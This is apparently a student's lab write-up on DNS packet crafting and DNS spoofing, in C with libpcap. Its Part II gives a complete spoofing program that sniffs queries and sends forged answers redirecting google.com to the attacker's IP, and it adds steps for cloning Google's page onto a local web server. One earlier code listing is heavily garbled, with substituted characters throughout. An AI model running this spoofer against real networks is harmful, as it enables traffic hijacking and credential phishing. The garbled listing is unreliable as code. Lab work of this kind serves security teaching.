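static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Build the Part I request frame with valid checksums; returns the frame length.
 * pkt must hold at least ETH_LEN + IP_LEN + UDP_LEN + DNS_HDR_LEN + 259 bytes. */
size_t build_dns_request(uint8_t *pkt, const char *host)
{
    uint8_t *ip = pkt + ETH_LEN, *udp = ip + IP_LEN, *dns = udp + UDP_LEN;
    uint8_t qname[256];
    size_t qlen = dns_encode_name(host, qname);
    size_t udplen = UDP_LEN + DNS_HDR_LEN + qlen + 4;

    memset(pkt, 0, ETH_LEN + IP_LEN + udplen);
    /* Ethernet: dst B1..B6, src A1..A6, type 0x0800 (the lab's MAC values) */
    memcpy(pkt, "\xB1\xB2\xB3\xB4\xB5\xB6\xA1\xA2\xA3\xA4\xA5\xA6\x08\x00", ETH_LEN);
    ip[0] = 0x45;                                        /* version 4, IHL 5 */
    put16(ip + 2, (uint16_t)(IP_LEN + udplen));          /* total length */
    put16(ip + 4, 0xf1a4);                               /* identification */
    ip[8] = 64;                                          /* TTL */
    ip[9] = 17;                                          /* protocol UDP */
    memcpy(ip + 12, "\x01\x02\x03\x04\x06\x07\x08\x09", 8); /* 1.2.3.4 -> 6.7.8.9 */
    put16(udp, 4000);                                    /* source port */
    put16(udp + 2, 53);                                  /* destination port */
    put16(udp + 4, (uint16_t)udplen);
    put16(dns, 0xAABB);                                  /* transaction ID */
    put16(dns + 2, 0x0100);                              /* standard query, RD */
    put16(dns + 4, 1);                                   /* QDCOUNT */
    memcpy(dns + DNS_HDR_LEN, qname, qlen);
    put16(dns + DNS_HDR_LEN + qlen, 1);                  /* QTYPE A */
    put16(dns + DNS_HDR_LEN + qlen + 2, 1);              /* QCLASS IN */
    /* checksums last: IP over its header, UDP over pseudo-header + datagram */
    put16(ip + 10, ip_checksum(ip, IP_LEN));
    put16(udp + 6, udp_checksum(ip, udp, udplen));
    return ETH_LEN + IP_LEN + udplen;
}

/* Receiver-side verification: a correct header sums (with its checksum field
 * included) to 0xFFFF, so fold() returns 0. Returns 1 when both are valid. */
int checksums_valid(const uint8_t *pkt)
{
    const uint8_t *ip = pkt + ETH_LEN, *udp = ip + IP_LEN;
    size_t udplen = get16(udp + 4);
    uint32_t pseudo = ones_sum(ip + 12, 8, 0) + 17 + (uint32_t)udplen;
    return fold(ones_sum(ip, IP_LEN, 0)) == 0 && fold(ones_sum(udp, udplen, pseudo)) == 0;
}

int main(void)
{
    uint8_t pkt[1500];
    size_t n = build_dns_request(pkt, "vnexpress.net");
    printf("frame %zu bytes, ip_sum=0x%04x udp_sum=0x%04x valid=%d\n", n,
           get16(pkt + ETH_LEN + 10), get16(pkt + ETH_LEN + IP_LEN + 6), checksums_valid(pkt));
    return 0;
}
```

Flipping any byte of the datagram after the checksums are written makes checksums_valid() return 0, which is exactly why the v1 packets above show up in Wireshark with a checksum error.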

Answer: Dntai_dns_response_v2.c (with ip, udp checksum)
#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> #include <pcap.h> /* Ethernet headers are #define #$%E_E&' !" //strlen //malloc //you know what this is for //inet_addr , inet_ntoa , ntohs etc //getpid always e actly !" bytes */

/* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ /* address of host */

/* type of the host */ /* class */

struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl;

/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */

/* /* /* /* /* /* /* /* /* /*

5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */

};

u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst;

/* protocol */ /* checksum */

#define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*

===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */

struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ };

/* functions */ 5oid print_app_info(5oid) { printf(B+ns response 5ersion 7 writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);

5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } /* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords) // Ehen get to the last character // #tore the final counter into the dns name buffer

sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); return 0sum;

} unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); return 0sum; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /*

    /* ---------------- Build the [DNS RESPONSE] packet: Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query + Dns Answer ---------------- */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header *ip;           // pointer to the start of the ip header
    struct udp_header *udp;         // pointer to the start of the udp header
    struct dns_header *dns;         // pointer to the start of the dns header
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    struct dns_answer *dns_as;      // pointer to the start of the dns answer
    u_char *q_name;                 // Dns name in query

    int host_len = strlen(host);        // Hostname length
    int size_q_name = host_len + 2;     // size of the query name in DNS format (host length + 2)

    /* ---------------- Point each pointer at the corresponding region of the packet ---------------- */
    eth = (struct ethernet_header *)(packet);
    /****************************TO BE MODIFIED 1 ***************************/
    ip = (struct ip_header *)(packet + SIZE_ETH);
    /****************************TO BE MODIFIED 2 ***************************/
    udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
    /****************************TO BE MODIFIED 3 ***************************/
    dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));
    // Query name Pointer
    q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
    // Dns Query Pointer
    dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);
    // Dns Answer Pointer
    dns_as = (struct dns_answer *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));

    /* Ethernet Header */
    bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", &eth->ether_shost, 6);    // Source MAC Address
    /****************************TO BE MODIFIED 4 ***************************/
    bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", &eth->ether_dhost, 6);    // Destination MAC Address
    bcopy("\x08\x00", (char *)&eth->ether_type, 2);             // Type IP (0x0800)

    /* IP Header */
    ip->ip_vhl = 0x45;              // IP version 4 + header length = 5 words (20 bytes)
    ip->ip_tos = 0x00;              // Differentiated Services Field
    ip->ip_id = htons(0xf1a4);      // Identification
    ip->ip_off = 0;
    ip->ip_ttl = 64;                // time to live
    ip->ip_p = UDP_PROTO;           // UDP protocol
    ip->ip_sum = 0;                 // ip checksum (computed below)

    (ip->ip_src).s_addr = inet_addr("6.7.8.9");    // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("1.2.3.4");    // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(53);     // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(4000);   // destination port
    udp->udp_sum = 0;               // udp checksum (computed below)

    /* DNS Header */
    dns->id = htons(0xAABB);        // transaction ID
    dns->flags = htons(0x8180);     // flags (standard query response)
    dns->q_count = htons(0x001);    // number of questions
    dns->ans_count = htons(0x001);  // number of answers
    dns->auth_count = 0;            // number of authority records
    dns->add_count = 0;             // number of additional records

    /* DNS Query: query_name, dns query header, dns query answer */
    // Convert hostname to dns format and store it in memory where q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type = htons(1);      // type of the host
    dns_qr->q_class = htons(1);     // class

    /* DNS Answer */
    bcopy("\xc0\x0c", &dns_as->a_name, 2);          // compression pointer to the query name
    dns_as->a_type = htons(1);                      // type of the host
    dns_as->a_class = htons(1);                     // class
    bcopy("\x00\x00\x01\xc3", &dns_as->a_ttl, 4);   // time to live
    dns_as->a_len = htons(4);                       // rdata length

    /****************************TO BE MODIFIED 7 ***************************/
    dns_as->a_addr.s_addr = inet_addr("111.65.248.132");

    /* Update the length of the IP header and the UDP header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query) + sizeof(struct dns_answer));
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));    // total length
    size_ip = IP_HL(ip) * 4;

    /* UPDATE THE CHECKSUM OF THE IP HEADER AND THE UDP HEADER */
    ip->ip_sum = 0;
    ip->ip_sum = csum((unsigned short *)(packet + SIZE_ETH), size_ip);
    udp->udp_sum = 0;
    udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&(ip->ip_src), (u_short *)&(ip->ip_dst), (unsigned short *)udp));

    /* send the packet 6 times */
    for (i = 0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    }
    return 0;
}

Result with capturing packet:
• Receive 6 dns response packets

Part II: DNS attack

Normal scenario: Hereafter are the steps for the user on Host1 to connect to a website, e.g. GMAIL
• On Host1, the user enters www.gmail.com in the browser
• Host1 asks host2 for the ip address of www.gmail.com
• Host2 returns the ip address of www.google.com (ipgoogle) to host1
• host1 connects to (ipgoogle)
Attack scenario
• The user enters www.gmail.com in the browser.
• Host3 sniffs the traffic on the wire and tries to do DNS session hijacking by racing against host2. In fact, it tries to provide a fake answer to host 1 (Host 3 returns its own ip address (ip3) instead of the actual ip address of gmail (ipgoogle) to host 1)
• Host1 receives the fake answer from host 3 and connects to host3 (ip3), believing that it is talking to www.google.com
Task 1: Create a program running on host3, called dnsattack.c, which
• captures the network traffic and filters out the dns packets (get the code from Lab2-part1)
• creates the fake response packet with the information mentioned above (get the code from Lab2-part1)
• sends the fake packet to host1
To help you in creating the program, I sent you the example dnsattack.c program. You need to add the appropriate code at the different places where I have marked "TO BE MODIFIED".

Answer: Dntai_dns_attack_v1.c
#include <stdio.h>           //printf, fprintf
#include <string.h>          //strlen
#include <stdlib.h>          //malloc
#include <sys/socket.h>      //you know what this is for
#include <arpa/inet.h>       //inet_addr , inet_ntoa , ntohs etc
#include <netinet/in.h>
#include <netinet/ether.h>   //ether_ntoa
#include <unistd.h>          //getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14
/* default snap length (maximum bytes per packet to capture) */
#define SNAP_LEN 1518
/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6
/* UDP PROTOCOL */
#define UDP_PROTO 17

struct dns_answer {
    u_short a_name;          /* answer host name (compression pointer) */
    u_short a_type;          /* answer host type */
    u_short a_class;         /* answer host class */
    u_char a_ttl[4];         /* time to live, 4 bytes */
    u_short a_len;           /* length */
    struct in_addr a_addr;   /* address of host */
};

struct dns_query {
    u_short q_type;          /* type of the host */
    u_short q_class;         /* class */
};

struct ethernet_header {
    u_char ether_dhost[ETHER_ADDR_LEN];   /* destination host address */
    u_char ether_shost[ETHER_ADDR_LEN];   /* source host address */
    u_short ether_type;                   /* IP, ARP, RARP, etc */
};

/* IP header */
struct ip_header {
    u_char ip_vhl;                  /* version << 4 | header length >> 2 */
    u_char ip_tos;                  /* type of service */
    u_short ip_len;                 /* total length */
    u_short ip_id;                  /* identification */
    u_short ip_off;                 /* fragment offset field */
#define IP_RF 0x8000                /* reserved fragment flag */
#define IP_DF 0x4000                /* dont fragment flag */
#define IP_MF 0x2000                /* more fragments flag */
#define IP_OFFMASK 0x1fff           /* mask for fragmenting bits */
    u_char ip_ttl;                  /* time to live */
    u_char ip_p;                    /* protocol */
    u_short ip_sum;                 /* checksum */
    struct in_addr ip_src, ip_dst;  /* source and destination address */
};
#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

struct udp_header {
    u_short udp_sport;   /* source port */
    u_short udp_dport;   /* destination port */
    u_short udp_len;     /* udp length */
    u_short udp_sum;     /* udp checksum */
};

struct dns_header {
    u_short id;          /* transaction ID */
    u_short flags;       /* flags */
    u_short q_count;     /* number of question entries */
    u_short ans_count;   /* number of answer entries */
    u_short auth_count;  /* number of authority entries */
    u_short add_count;   /* number of resource entries */
};

pcap_t *handle;          /* packet capture handle */

/* functions */
void print_app_info(void);
unsigned short csum(unsigned short *buf, int nwords);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

/* One's-complement checksum of the IP header; nwords is the header length in bytes */
unsigned short csum(unsigned short *buf, int nwords)
{
    unsigned long sum = 0;
    int i;
    for (i = 0; i < (nwords / 2); i++)
        sum += buf[i];
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

/* UDP checksum over the pseudo header (source ip, destination ip, protocol, length) and the
   UDP datagram; len is the UDP length in bytes, the result is returned in host byte order */
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[])
{
    unsigned short udp_protocol = UDP_PROTO;
    unsigned short padding = 0;
    unsigned long sum;
    int i;
    // Find out if the length of data is even or odd. If odd, add a padding byte = 0 at the end of the packet
    if (len % 2 != 0) {
        padding = 1;
        ((unsigned char *)buff)[len] = 0;
    }
    // Initialize sum to zero
    sum = 0;
    // Sum all the buffer in 16 bit words
    for (i = 0; i < (len + padding) / 2; i++)
        sum += ntohs((unsigned short)buff[i]);
    // Sum the pseudo header which contains source ip, destination ip, protocol number and length
    for (i = 0; i < 2; i++)
        sum += ntohs((unsigned short)ip_src[i]);
    for (i = 0; i < 2; i++)
        sum += ntohs((unsigned short)ip_dst[i]);
    sum += (unsigned short)udp_protocol + (unsigned short)len;
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return ~sum;
}

/* Convert a DNS-format name (length-prefixed labels) back into a dotted host name */
char *dns_name_revert(char *q_name, char *host)
{
    int count, len, first, i;
    count = 0;
    len = 0;
    first = q_name[count];      // length of the first label
    count++;
    while (first > 0) {
        for (i = 0; i < first; i++) {   // copy one label
            host[len] = q_name[count];
            len++;
            count++;
        }
        first = q_name[count];  // length of the next label (0 = end of name)
        count++;
        if (first > 0) {
            host[len] = '.';
            len++;
        }
    }
    host[len] = 0;
    return host;
}

void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    /* declare pointers to packet headers */
    struct ethernet_header *ethernet;      /* The ethernet header [1] */
    struct ip_header *ip;                  /* The IP header */
    struct udp_header *udp;
    struct dns_header *dns;
    struct dns_query *dns_qr;
    struct dns_answer *dns_as;
    int size_ip;
    u_char new_packet[5000];
    memset(new_packet, 0, 5000);

    //copy the content of the captured packet to the new buffer
    ip = (struct ip_header *)(packet + SIZE_ETH);
    if (ntohs(ip->ip_len) + SIZE_ETH > header->caplen)   // never read past the captured bytes
        return;
    bcopy(packet, new_packet, ntohs(ip->ip_len) + SIZE_ETH);
    /****************FROM NOW ON WE WORK ON THE NEW BUFFER**************************/

    /* define ethernet header */
    ethernet = (struct ethernet_header *)(new_packet);

    //HERE I SWITCH THE MAC SOURCE
    char mac[6];
    /* print source and destination MAC addresses */
    printf("Switch the source and destination MAC addresses\n");
    printf("(Before) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
    printf("(Before) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));
    //TO BE MODIFIED 1:
    bcopy(ethernet->ether_shost, mac, 6);
    bcopy(ethernet->ether_dhost, ethernet->ether_shost, 6);
    bcopy(mac, ethernet->ether_dhost, 6);
    printf("(After) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
    printf("(After) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));

    /* define/compute ip header offset */
    ip = (struct ip_header *)(new_packet + SIZE_ETH);
    size_ip = IP_HL(ip) * 4;
    if (size_ip < 20) {
        printf("   * Invalid IP header length: %u bytes\n", size_ip);
        return;
    }
    /* print source and destination IP addresses */
    printf("Switch the source and destination IP addresses\n");
    printf("(Before) From: %s\n", inet_ntoa(ip->ip_src));
    printf("(Before) To: %s\n", inet_ntoa(ip->ip_dst));
    //TO BE MODIFIED 2: your code to swap the IP addresses
    struct in_addr ip_addr_tmp;
    ip_addr_tmp = ip->ip_src;
    ip->ip_src = ip->ip_dst;
    ip->ip_dst = ip_addr_tmp;
    printf("(After) From: %s\n", inet_ntoa(ip->ip_src));
    printf("(After) To: %s\n", inet_ntoa(ip->ip_dst));

    printf("Switch the source and destination ports\n");
    udp = (struct udp_header *)(new_packet + size_ip + SIZE_ETH);
    printf("(Before) udp source port: %d \n", ntohs(udp->udp_sport));
    printf("(Before) udp destination port: %d \n", ntohs(udp->udp_dport));
    //TO BE MODIFIED 3: your code to swap the udp ports
    u_short port_tmp;
    port_tmp = udp->udp_sport;
    udp->udp_sport = udp->udp_dport;
    udp->udp_dport = port_tmp;
    printf("(After) udp source port: %d \n", ntohs(udp->udp_sport));
    printf("(After) udp destination port: %d \n", ntohs(udp->udp_dport));

    u_char *q_name;            // Dns name in query
    int size_q_name;
    dns = (struct dns_header *)(new_packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));
    // Query name
    q_name = (u_char *)(new_packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
    size_q_name = strlen((char *)q_name) + 1;

    dns_qr = (struct dns_query *)(new_packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);
    dns_as = (struct dns_answer *)(new_packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));

    /*-----------------------CONSTRUCT DNS HEADER-----------------------*/
    dns->flags = htons(0x8180);        // flags (standard query response)
    dns->q_count = htons(0x001);       // number of questions
    dns->ans_count = htons(1);         // number of answers
    dns->auth_count = 0;               // number of authority records
    dns->add_count = 0;                // number of additional records
    /*-----------------------CONSTRUCT DNS ANSWER-----------------------*/
    bcopy("\xc0\x0c", &dns_as->a_name, 2);          // compression pointer to the query name
    dns_as->a_type = htons(1);                      // type of the host
    dns_as->a_class = htons(1);                     // class
    bcopy("\x00\x00\x05\xdb", &dns_as->a_ttl, 4);   // time to live
    dns_as->a_len = htons(4);
    // TO BE MODIFIED 4: change the ip address as required
    dns_as->a_addr.s_addr = inet_addr((char *)args);

    /*-----------------------CHECKSUM AND LENGTH-----------------------*/
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query) + sizeof(struct dns_answer));
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));    // total length
    size_ip = IP_HL(ip) * 4;
    ip->ip_sum = 0;
    ip->ip_sum = csum((unsigned short *)(new_packet + SIZE_ETH), size_ip);
    udp->udp_sum = 0;
    udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&(ip->ip_src), (u_short *)&(ip->ip_dst), (unsigned short *)udp));

    int result;
    char host[5000];
    dns_name_revert((char *)q_name, host);
    printf("Lookup domain name: %s\n", host);
    if (strstr(host, "google.com") != NULL) {
        result = pcap_sendpacket(handle, new_packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    } else {
        printf("[Packet not sent]\n");
    }
    return;
}

/* http://www.binarytides.com/c-program-to-get-ip-address-from-interface-name-on-linux/ */
#include <net/if.h>
#include <sys/ioctl.h>
char *get_ip_address(char *iface, char *buf)
{
    struct ifreq ifr;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    // type of address to retrieve - IPv4 IP address
    ifr.ifr_addr.sa_family = AF_INET;
    //Copy the interface name into the ifreq structure
    strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);
    ioctl(fd, SIOCGIFADDR, &ifr);
    close(fd);
    // result
    strcpy(buf, inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
    return buf;
}

int main(int argc, char *argv[])
{
    char *dev = NULL;                        /* capture device name */
    char errbuf[PCAP_ERRBUF_SIZE];           /* error buffer */
    char ip_current_address[20];

    char filter_exp[] = "udp dst port 53";   /* filter expression [3] */
    struct bpf_program fp;                   /* compiled filter program (expression) */
    bpf_u_int32 mask;                        /* subnet mask */
    bpf_u_int32 net;                         /* ip */
    int num_packets = 0;                     /* number of packets to capture */

    /* check for capture device name on command-line */
    if (argc == 2) {
        dev = argv[1];
    } else if (argc > 2) {
        fprintf(stderr, "error: unrecognized command-line options\n\n");
        //print_app_usage();
        exit(EXIT_FAILURE);
    } else {
        /* find a capture device if not specified on command-line */
        dev = pcap_lookupdev(errbuf);
        if (dev == NULL) {
            fprintf(stderr, "Couldn't find default device: %s\n", errbuf);
            exit(EXIT_FAILURE);
        }
    }
    /* get network number and mask associated with capture device */
    if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
        fprintf(stderr, "Couldn't get netmask for device %s: %s\n", dev, errbuf);
        net = 0;
        mask = 0;
    }
    /* print capture info */
    printf("Device: %s\n", dev);
    printf("Number of packets: %d\n", num_packets);
    printf("Filter expression: %s\n", filter_exp);
    get_ip_address(dev, ip_current_address);
    printf("Current IP Address: %s\n", ip_current_address);

    /* open capture device */
    handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
    if (handle == NULL) {
        fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
        exit(EXIT_FAILURE);
    }
    /* make sure we're capturing on an Ethernet device [2] */
    if (pcap_datalink(handle) != DLT_EN10MB) {
        fprintf(stderr, "%s is not an Ethernet\n", dev);
        exit(EXIT_FAILURE);
    }
    /* compile the filter expression */
    if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
        fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
        exit(EXIT_FAILURE);
    }
    /* apply the compiled filter */
    if (pcap_setfilter(handle, &fp) == -1) {
        fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
        exit(EXIT_FAILURE);
    }
    /* now we can set our callback function */
    pcap_loop(handle, num_packets, got_packet, (u_char *)ip_current_address);

    /* cleanup */
    pcap_freecode(&fp);
    pcap_close(handle);
    printf("\nCapture complete.\n");
    return 0;
}

Explain:
• Modified code 1:
    //HERE I SWITCH THE MAC SOURCE
    char mac[6];
    /* print source and destination MAC addresses */
    printf("Switch the source and destination MAC addresses\n");
    printf("(Before) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
    printf("(Before) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));
    //TO BE MODIFIED 1:
    bcopy(ethernet->ether_shost, mac, 6);
    bcopy(ethernet->ether_dhost, ethernet->ether_shost, 6);
    bcopy(mac, ethernet->ether_dhost, 6);
    printf("(After) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
    printf("(After) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));

• Modified code 2:
    //TO BE MODIFIED 2: your code to swap the IP addresses
    struct in_addr ip_addr_tmp;
    ip_addr_tmp = ip->ip_src;
    ip->ip_src = ip->ip_dst;
    ip->ip_dst = ip_addr_tmp;

• Modified code 3:
    //TO BE MODIFIED 3: your code to swap the udp ports
    u_short port_tmp;
    port_tmp = udp->udp_sport;
    udp->udp_sport = udp->udp_dport;
    udp->udp_dport = port_tmp;

• Modified code 4:
/* http://www.binarytides.com/c-program-to-get-ip-address-from-interface-name-on-linux/ */
#include <net/if.h>
#include <sys/ioctl.h>
char *get_ip_address(char *iface, char *buf)
{
    struct ifreq ifr;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    // type of address to retrieve - IPv4 IP address
    ifr.ifr_addr.sa_family = AF_INET;
    //Copy the interface name into the ifreq structure
    strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);
    ioctl(fd, SIOCGIFADDR, &ifr);
    close(fd);
    // result
    strcpy(buf, inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
    return buf;
}

void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    ...
    // TO BE MODIFIED 4: change the ip address as required
    dns_as->a_addr.s_addr = inet_addr((char *)args);
    ...
}

int main(int argc, char *argv[])
{
    ...
    char ip_current_address[20];
    ...
    get_ip_address(dev, ip_current_address);
    printf("Current IP Address: %s\n", ip_current_address);
    ...
    /* now we can set our callback function */
    pcap_loop(handle, num_packets, got_packet, (u_char *)ip_current_address);
    ...
}

• Modified code Extra:
char *dns_name_revert(char *q_name, char *host)
{
    int count, len, first, i;
    count = 0;
    len = 0;
    first = q_name[count];
    count++;
    while (first > 0) {
        for (i = 0; i < first; i++) {
            host[len] = q_name[count];
            len++;
            count++;
        }
        first = q_name[count];
        count++;
        if (first > 0) {
            host[len] = '.';
            len++;
        }
    }
    host[len] = 0;
    return host;
}

void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    ...
    char host[5000];
    dns_name_revert((char *)q_name, host);
    printf("Lookup domain name: %s\n", host);
    if (strstr(host, "google.com") != NULL) {
        result = pcap_sendpacket(handle, new_packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    } else {
        printf("[Packet not sent]\n");
    }
    ...
}

Task 2: Install a webserver on host3, create a home page to make it look like www.gmail.com
Answer: On Host2
$ sudo apt-get install apache2
$ sudo service apache2 start
$ cd /var/www/
$ sudo su root
$ wget google.com -O index.html

Task 3: Test and make sure your attack works
- On host3, run sudo ./dntai_dns_attack
- On host1, run a terminal.
  • Type nslookup google.com (the attacker redirects the dns of google)
  • Type nslookup vnexpress.net
  • Open Firefox, type in the address google.com
Screen on Host 1

Question 1: Compare the dns request and dns response with respect to
a) Source MAC address and Destination MAC address
b) IP source, IP destination
c) source port, destination port
Answer
• Dns Request vs Dns Response about Mac Address
  Request:
  Response:
• Dns Request vs Dns Response about Ip Address
  Request:
  Response:
• Dns Request vs Dns Response about Port
  Request:
  Response:
• Result: the dns request and response swap each other's mac address, ip address, and port between source and destination.

Question 2: What is the role of the Transaction ID field of the DNS packet?
Answer
